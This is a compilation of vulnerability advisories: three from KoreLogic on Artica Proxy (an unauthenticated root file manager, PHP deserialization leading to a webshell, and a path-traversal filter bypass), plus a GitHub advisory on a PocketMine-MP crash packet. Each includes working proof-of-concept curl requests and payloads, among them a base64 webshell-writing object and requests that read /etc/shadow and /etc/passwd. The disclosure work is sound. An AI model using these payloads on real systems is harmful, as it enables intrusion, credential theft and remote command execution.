    KL-001-2024-003: Artica Proxy Unauthenticated File Manager VulnerabilityTitle: Artica Proxy Unauthenticated File Manager VulnerabilityAdvisory ID: KL-001-2024-003Publication Date: 2024.03.05Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt1. Vulnerability Details      Affected Vendor: Artica      Affected Product: Artica Proxy      Affected Version: 4.40 and 4.50      Platform: Debian 10 LTS      CWE Classification: CWE-288: Authentication Bypass Using an                          Alternate Path or Channel, CWE-552: Files                          or Directories Accessible to External                          Parties      CVE ID: CVE-2024-20552. Vulnerability Description      The "Rich Filemanager" feature of Artica Proxy provides a      web-based interface for file management capabilities. When      the feature is enabled, it does not require authentication by      default, and runs as the root user.3. Technical Description      The Artica Proxy can be installed with a small amount of      "Features" enabled. Within the administrative web interface,      additional features can be installed, enabled, and disabled. The      "Rich Filemanager" feature is disabled by default. Enabling      this feature will spawn a listener on port 5000/tcp bound to      0.0.0.0. By default, when this feature is enabled, authentication      is not required to access the web interface. The "Rich      Filemanager" runs as the root user. This provides an      unauthenticated attacker complete access to the file system.        root@artica:~# ps -efww | grep -i File        root      1888  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER        root      1889  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER      This can be exploited by an attacker to add entries in to      /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create      an additional root-level account that has the ability to SSH      in to the system.4. Mitigation and Remediation Recommendation      No response from vendor. Rich Filemanager feature is disabled      by default. Leave it that way.5. Credit      This vulnerability was discovered by Jim Becher of KoreLogic,      Inc.6. Disclosure Timeline      2023.12.18 - KoreLogic requests vulnerability contact and                   secure communication method from Artica.      2023.12.18 - Artica Support issues automated ticket #1703011342                   promising follow-up from a human.      2024.01.10 - KoreLogic again requests vulnerability contact and                   secure communication method from Artica.      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from                   mail.articatech.com with response                   "Client host rejected: Go Away!"      2024.01.11 - KoreLogic requests vulnerability contact and                   secure communication method via                   https://www.articatech.com/ 'Contact Us' web form.      2024.01.23 - KoreLogic requests CVE from MITRE.      2024.01.23 - MITRE issues automated ticket #1591692 promising                   follow-up from a human.      2024.02.01 - 30 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.06 - KoreLogic requests update on CVE from MITRE.      2024.02.15 - KoreLogic requests update on CVE from MITRE.      2024.02.22 - KoreLogic reaches out to alternate CNA for                   CVE identifiers.      2024.02.26 - 45 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.29 - Vulnerability details presented to AHA!                   (takeonme.org) by proxy.      2024.03.01 - AHA! issues CVE-2024-2055 to track this                   vulnerability.      2024.03.05 - KoreLogic public disclosure.7. Proof of Concept      Step 1: Move /etc/shadow to /tmp/shadow      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'{"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}      Step 2: Download /tmp/shadow      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' $'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::      daemon:*:19507:0:99999:7:::      bin:*:19507:0:99999:7:::      sys:*:19507:0:99999:7:::      sync:*:19507:0:99999:7:::      games:*:19507:0:99999:7:::      man:*:19507:0:99999:7:::      lp:*:19507:0:99999:7:::      mail:*:19507:0:99999:7:::      news:*:19507:0:99999:7:::      uucp:*:19507:0:99999:7:::      proxy:*:19507:0:99999:7:::      www-data:*:19507:0:99999:7:::      backup:*:19507:0:99999:7:::      list:*:19507:0:99999:7:::      irc:*:19507:0:99999:7:::      gnats:*:19507:0:99999:7:::      nobody:*:19507:0:99999:7:::      _apt:*:19507:0:99999:7:::      systemd-timesync:*:19507:0:99999:7:::      systemd-network:*:19507:0:99999:7:::      systemd-resolve:*:19507:0:99999:7:::      messagebus:*:19507:0:99999:7:::      quagga:*:19507:0:99999:7:::      apt-mirror:*:19507:0:99999:7:::      privoxy:*:19507:0:99999:7:::      ntp:*:19507:0:99999:7:::      redsocks:!:19507:0:99999:7:::      prads:*:19507:0:99999:7:::      freerad:*:19507:0:99999:7:::      vnstat:*:19507:0:99999:7:::      stunnel4:!:19507:0:99999:7:::      sshd:*:19507:0:99999:7:::      vde2-net:*:19507:0:99999:7:::      memcache:!:19507:0:99999:7:::      davfs2:*:19507:0:99999:7:::      ziproxy:!:19507:0:99999:7:::      proftpd:!:19507:0:99999:7:::      ftp:*:19507:0:99999:7:::      mosquitto:*:19507:0:99999:7:::      openldap:!:19507:0:99999:7:::      munin:*:19507:0:99999:7:::      msmtp:*:19507:0:99999:7:::      Debian-snmp:!:19507:0:99999:7:::      opendkim:*:19507:0:99999:7:::      avahi:*:19507:0:99999:7:::      glances:*:19507:0:99999:7:::      ArticaStats:!:19507:0:99999:7:::      netdata:!:19507:0:99999:7:::      mysql:!:19507:0:99999:7:::      postfix:!:19507:0:99999:7:::      squid:!:19507:0:99999:7:::      smokeping:!:19507:0:99999:7:::      unbound:!:19645:0:99999:7:::      Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208'{"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.40 / 4.50 Authentication Bypass / Privilege Escalation

The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the www-data user. Version 4.50 is affected.

KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability

Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability  
Advisory ID: KL-001-2024-002  
Publication Date: 2024.03.05  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt

1. Vulnerability Details

      Affected Vendor: Artica  
      Affected Product: Artica Proxy  
      Affected Version: 4.50  
      Platform: Debian 10 LTS  
      CWE Classification: CWE-502 Deserialization of Untrusted Data  
      CVE ID: CVE-2024-2054

2. Vulnerability Description

      The Artica Proxy administrative web application will deserialize  
      arbitrary PHP objects supplied by unauthenticated users and  
      subsequently enable code execution as the "www-data" user.

3. Technical Description

      Prior to authentication, a user can send an HTTP request  
      to the "/wizard/wiz.wizard.progress.php" endpoint. This  
      endpoint processes the "build-js" query parameter by base64  
      decoding the provided value and then calling the "unserialize"  
      PHP function with the decoded value as input.

      Code snippet from "wiz.wizard.progress.php":

        if(isset($_GET["build-js"])){buildjs();exit;}  
        ...  
        $ARRAY=unserialize(base64_decode($_GET["build-js"]));

      To exploit this vulnerability, a user can leverage the  
      installed "Net_DNS2" library autoloader to instantiate the  
      "Net_DNS2_Cache_File" class. The "__destruct" method  
      within this class will write to arbitrary files defined  
      by the class:

        public function __destruct()  
        {  
            //  
            // if there's no cache file set, then there's nothing to do  
            //  
            if (strlen($this->cache_file) == 0) {  
                return;  
            }

            //  
            // open the file for reading/writing  
            //  
            $fp = fopen($this->cache_file, 'a+');  
            if ($fp !== false) {  
            ...  
            if (!is_null($data)) {

                //  
                // write the file contents  
                //  
                fwrite($fp, $data);  
            }

      An unauthenticated user can overwrite existing files and  
      insert a webshell to execute malicious PHP as the "www-data"  
      user.

4. Mitigation and Remediation Recommendation

      No response from vendor. This vulnerability can be remediated  
      by deleting the 'usr/share/artica-postfix/wizard' directory  
      if it is not needed. Otherwise, move it to a location outside  
      of the web root.

5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic,  
      Inc.

6. Disclosure Timeline

      2023.12.18 - KoreLogic requests vulnerability contact and  
                   secure communication method from Artica.  
      2023.12.18 - Artica Support issues automated ticket #1703011342  
                   promising follow-up from a human.  
      2024.01.10 - KoreLogic again requests vulnerability contact and  
                   secure communication method from Artica.  
      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from  
                   mail.articatech.com with response  
                   "Client host rejected: Go Away!"  
      2024.01.11 - KoreLogic requests vulnerability contact and  
                   secure communication method via  
                   https://www.articatech.com/ 'Contact Us' web form.  
      2024.01.23 - KoreLogic requests CVE from MITRE.  
      2024.01.23 - MITRE issues automated ticket #1591692 promising  
                   follow-up from a human.  
      2024.02.01 - 30 business days have elapsed since KoreLogic  
                   attempted to contact the vendor.  
      2024.02.06 - KoreLogic requests update on CVE from MITRE.  
      2024.02.15 - KoreLogic requests update on CVE from MITRE.  
      2024.02.22 - KoreLogic reaches out to alternate CNA for  
                   CVE identifiers.  
      2024.02.26 - 45 business days have elapsed since KoreLogic  
                   attempted to contact the vendor.  
      2024.02.29 - Vulnerability details presented to AHA!  
                   (takeonme.org) by proxy.  
      2024.03.01 - AHA! issues CVE-2024-2054 to track this  
                   vulnerability.  
      2024.03.05 - KoreLogic public disclosure.

7. Proof of Concept

      To overwrite the "wiz.upload.php" file to contain a PHP  
      webshell, the following serialized object can be base64  
      encoded and submitted via the "build-js" query parameter:

O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php   
system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}

        $ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k   
"$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d"   
&& curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";

      {"uid=33(www-data) gid=33(www-data) groups=33(www-data)  
       ":{"cache_date":1696883506,"ttl":8303116493}}

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.50 Unauthenticated PHP Deserialization

Artica Proxy versions 4.40 and 4.50 suffer from a local file inclusion protection bypass vulnerability that allows for path traversal.

    KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass VulnerabilityTitle: Artica Proxy Unauthenticated LFI Protection Bypass VulnerabilityAdvisory ID: KL-001-2024-001Publication Date: 2024.03.05Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt1. Vulnerability Details      Affected Vendor: Artica      Affected Product: Artica Proxy      Affected Version: 4.40 and 4.50      Platform: Debian 10 LTS      CWE Classification: CWE-23: Relative Path Traversal      CVE ID: CVE-2024-20532. Vulnerability Description      The Artica Proxy administrative web application attempts to      prevent local file inclusion. These protections can be bypassed      and arbitrary file requests supplied by unauthenticated      users will be returned according to the privileges of the      "www-data" user.3. Technical Description      Prior to authentication, a user can send an HTTP request to      the "images.listener.php" endpoint. This endpoint processes      the "mailattach" query parameter and concatonates the user      supplied value to the "/opt/artica/share/www/attachments/"      file path. The contents of the file located at the newly      created path is returned in the HTTP response body.      The "images.listener.php" endpoint attempts to prevent      a local file inclusion vulnerability by stripping strings      that attempt to traverse into the parent directory from      the user supplied "mailattach" value:$_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]);$file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}";        header("Content-type: application/force-download" );        header("Content-Disposition: attachment; \                filename=\"{$_GET["mailattach"]}\"");        header("Content-Length: ".filesize($file)."" );        header("Expires: 0" );        readfile($file);      If effective, this approach would limit files      accessible by this endpoint to those within the      "/opt/artica/share/www/attachments/" directory. Unfortunately,      the removal of the "../" string is only performed once, so      the resulting file path is not checked.  By using the path      "..././foo.txt", the "images.listener.php" endpoint removes the      "../" string resulting in "../foo.txt" - a relative file path      to traverse to the parent directory.      The strings "/etc/" and "passwd" are also stripped from the file      path as many methods of detecting a path traversal vulnerability      rely on fetching the "/etc/passwd" file. By inserting these      strings into specific locations, a user suppplied "mailattach"      value such as "/epasswdtc/ppasswdasswd" is transformed into      "/etc/passwd", bypassing the protection entirely.      An unauthenticated user can leverage this endpoint to read      files on the system, according to the privileges of the      "www-data" user.4. Mitigation and Remediation Recommendation      No response from vendor; no remediation available.5. Credit      This vulnerability was discovered by Jaggar Henry of KoreLogic,      Inc.6. Disclosure Timeline      2023.12.18 - KoreLogic requests vulnerability contact and                   secure communication method from Artica.      2023.12.18 - Artica Support issues automated ticket #1703011342                   promising follow-up from a human.      2024.01.10 - KoreLogic again requests vulnerability contact and                   secure communication method from Artica.      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from                   mail.articatech.com with response                   "Client host rejected: Go Away!"      2024.01.11 - KoreLogic requests vulnerability contact and                   secure communication method via                   https://www.articatech.com/ 'Contact Us' web form.      2024.01.23 - KoreLogic requests CVE from MITRE.      2024.01.23 - MITRE issues automated ticket #1591692 promising                   follow-up from a human.      2024.02.01 - 30 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.06 - KoreLogic requests update on CVE from MITRE.      2024.02.15 - KoreLogic requests update on CVE from MITRE.      2024.02.22 - KoreLogic reaches out to alternate CNA for                   CVE identifiers.      2024.02.26 - 45 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.29 - Vulnerability details presented to AHA!                   (takeonme.org) by proxy.      2024.03.01 - AHA! issues CVE-2024-2053 to track this                   vulnerability.      2024.03.05 - KoreLogic public disclosure.7. Proof of Concept      $ curl -k 'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd'      root:x:0:0:root:/root:/bin/bash      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin      bin:x:2:2:bin:/bin:/usr/sbin/nologin      sys:x:3:3:sys:/dev:/usr/sbin/nologin      sync:x:4:65534:sync:/bin:/bin/sync      games:x:5:60:games:/usr/games:/usr/sbin/nologin      man:x:6:12:man:/var/cache/man:/usr/sbin/nologin      lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin      mail:x:8:8:mail:/var/mail:/usr/sbin/nologin      news:x:9:9:news:/var/spool/news:/usr/sbin/nologin      uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin      proxy:x:13:13:proxy:/bin:/usr/sbin/nologin      www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin      backup:x:34:34:backup:/var/backups:/usr/sbin/nologin      list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin      irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin      gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin      nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin      _apt:x:100:65534::/nonexistent:/usr/sbin/nologin      systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin      systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin      systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin      messagebus:x:104:110::/nonexistent:/usr/sbin/nologin      mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false      quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin      apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh      privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin      ntp:x:109:117::/nonexistent:/usr/sbin/nologin      redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin      prads:x:111:120::/home/prads:/usr/sbin/nologin      freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin      vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin      stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin      sshd:x:115:65534::/run/sshd:/usr/sbin/nologin      vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin      memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false      davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin      ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin      proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin      ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin      mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin      openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false      munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin      msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin      Debian-snmp:x:126:132::/var/lib/snmp:/bin/false      opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin      avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin      glances:x:129:135::/var/lib/glances:/usr/sbin/nologinArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash      Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin      smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin      debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh      netdata:x:1001:1002:netdata:/home/netdata:/bin/bash      postfix:x:1002:1001::/home/postfix:/bin/sh      ...      ...The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.40 / 4.50 Local File Inclusion / Traversal

### Summary
If a client sends a BookEditPacket with InventorySlot greater than 35, the server will crash due to an unhandled exception thrown by `BaseInventory->getItem()`.

### Details
Crashes at https://github.com/pmmp/PocketMine-MP/blob/b744e09352a714d89220719ab6948a010ac636fc/src/network/mcpe/handler/InGamePacketHandler.php#L873

### PoC
Using Gophertunnel, use `serverConn.WritePacket(&packet.BookEdit{InventorySlot: 36})`

### Impact
Server crash, all servers

### Patched versions
This issue was fixed by 47f011966092f275cc1b11f8de635e89fd9651a7, and the fix was released in 5.11.2.

**Package**

composer pocketmine/pocketmine-mp (Composer)

**Affected versions**

< 5.11.2

**Patched versions**

5.11.2

**Description**

**Summary**

If a client sends a BookEditPacket with InventorySlot greater than 35, the server will crash due to an unhandled exception thrown by BaseInventory->getItem().

**Details**

Crashes at https://github.com/pmmp/PocketMine-MP/blob/b744e09352a714d89220719ab6948a010ac636fc/src/network/mcpe/handler/InGamePacketHandler.php#L873

**PoC**

Using Gophertunnel, use serverConn.WritePacket(&packet.BookEdit{InventorySlot: 36})

**Impact**

Server crash, all servers

**Patched versions**

This issue was fixed by 47f011966092f275cc1b11f8de635e89fd9651a7, and the fix was released in 5.11.2.

**References**

*   GHSA-xc7j-wj36-qjfr
*   pmmp/PocketMine-MP@47f0119
*   https://github.com/pmmp/PocketMine-MP/blob/b744e09352a714d89220719ab6948a010ac636fc/src/network/mcpe/handler/InGamePacketHandler.php#L873

 dktapps published to pmmp/PocketMine-MP

Mar 5, 2024

Published to the GitHub Advisory Database

Mar 6, 2024

Reviewed

Mar 6, 2024

Tag

#php